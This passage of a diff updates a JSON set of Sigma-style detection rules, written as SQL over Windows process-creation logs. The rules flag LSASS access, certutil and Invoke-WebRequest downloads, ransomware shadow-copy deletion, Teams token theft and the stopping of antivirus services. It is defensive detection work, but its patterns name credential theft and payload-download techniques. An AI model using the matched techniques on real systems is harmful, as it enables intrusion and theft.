'\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_susp_pattern.yml" + "filename": "proc_creation_win_reg_delete_services.yml" }, { - "title": "HackTool - F-Secure C3 Load by Rundll32", - "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", - "status": "test", - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "author": "Alfie Champion (ajpc500)", + "title": "Suspicious Command With Teams Objects Paths", + "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "status": "experimental", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" }, { - "title": "Suspicious Invoke-WebRequest Usage", - "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "title": "Potential Recon Activity Using DriverQuery.EXE", + "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", "status": "experimental", - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" + "filename": "proc_creation_win_driverquery_recon.yml" }, { - "title": "PUA - Fast Reverse Proxy (FRP) Execution", - "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "title": "Potential Exploitation Attempt From Office Application", + "id": "868955d9-697e-45d4-a3da-360cefd7c216", "status": "experimental", - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "author": "frack113, Florian Roth", - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Legitimate use" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\frpc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" - ], - "filename": "proc_creation_win_pua_frp.yml" - }, - { - "title": "Potential Maze Ransomware Activity", - "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", - "status": "test", - "description": "Detects specific process characteristics of Maze ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", + "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", "tags": [ "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND NewProcessName LIKE '%.tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_maze_ransomware.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" }, { - "title": "Port Forwarding Attempt Via SSH", - "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "title": "Powershell ChromeLoader Browser Hijacker", + "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", "status": "experimental", - "description": "Detects suspicious SSH tunnel port forwarding to a local port", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "author": "Aedan Russell, frack113 (sigma)", "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1572", - "attack.t1021.001", - "attack.t1021.004" + "attack.persistence", + "attack.t1176" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ssh_port_forward.yml" + "filename": "proc_creation_win_browsers_chrome_load_extension.yml" }, { - "title": "Taskmgr as LOCAL_SYSTEM", - "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", + "id": "ef61af62-bc74-4f58-b49b-626448227652", "status": "experimental", - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_taskmgr_localsystem.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" }, { - "title": "PUA - AdvancedRun Suspicious Execution", - "id": "fa00b701-44c6-4679-994d-5a18afa8a707", + "title": "Suspicious Windows Update Agent Empty Cmdline", + "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" - }, - { - "title": "PowerShell Get-Process LSASS", - "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", - "status": "test", - "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_getprocess_lsass.yml" + "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" }, { - "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", - "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "title": "Potential Suspicious Mofcomp Execution", + "id": "1dd05363-104e-4b4a-b963-196a534b03a1", "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" + "filename": "proc_creation_win_mofcomp_execution.yml" }, { - "title": "HackTool - SharPersist Execution", - "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "title": "Potential CVE-2022-26809 Exploitation Attempt", + "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", "status": "experimental", - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unknown", + "Some cases in which the service spawned a werfault.exe process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharpersist.yml" + "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" }, { - "title": "HackTool - SharpEvtMute Execution", - "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "title": "Net WebClient Casing Anomalies", + "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", "status": "experimental", - "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_hktl_sharpevtmute.yml" - }, - { - "title": "Suspicious Windows Service Tampering", - "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", - "status": "experimental", - "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1489" - ], - "falsepositives": [ - "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE 